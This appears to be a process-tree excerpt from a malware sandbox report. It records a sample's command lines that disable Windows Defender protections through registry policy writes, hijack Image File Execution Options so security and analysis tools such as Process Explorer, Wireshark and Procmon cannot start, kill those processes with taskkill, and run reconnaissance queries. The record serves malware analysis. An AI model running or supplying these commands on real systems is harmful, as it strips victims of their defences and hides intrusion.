C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1756
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1356
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1832
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1896
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1816
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1552
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1612
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1892
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1424
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:332
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1348
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵PID:2004
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1764
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:840
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1768
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2020
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1908
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1620
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1832
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1464
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:872
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1484
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1524
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2028
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1400
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1624
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1544
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1804
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:2080
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2124
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2148
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2180
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2232
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2284
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:2316
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2344
-